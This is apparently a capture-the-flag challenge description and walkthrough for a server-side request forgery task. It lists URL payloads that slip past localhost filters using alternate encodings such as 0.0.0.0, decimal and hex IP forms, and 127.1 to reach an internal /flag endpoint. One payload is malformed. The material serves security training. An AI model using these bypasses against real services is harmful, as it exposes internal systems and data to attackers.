A seemingly secure URL validation service stands between you and sensitive internal data! 🔒 The server thinks it's safe behind its firewall, but clever request manipulation might just convince it to fetch data from places it shouldn't. 🕵️ Master the art of server-side request forgery and turn the server against itself! 💥
The challenge presents a URL validation service that fetches and displays content from provided URLs. The service has basic protections against accessing localhost and internal IP ranges.
Several methods can bypass the URL validation filters:
http://0.0.0.0:8080/flaghttp://0:8080/flaghttp://[::]8080/flaghttp://2130706433:8080/flag (127.0.0.1 in decimal)http://0x7f000001:8080/flag (127.0.0.1 in hex)http://127.0.0.1:8080/flag with URL encodingThe internal service runs on port 8080 and has a /flag endpoint that contains sensitive information:
Submit the bypass payload to the validation service:
http://0.0.0.0:8080/flagMultiple SSRF techniques work for this challenge:
http://0:8080/flaghttp://2130706433:8080/flaghttp://localhost:8080/flag (if filter bypass works)http://127.1:8080/flagEnter your email to continue
Choose a username to get started
We've sent a 9-character code to your email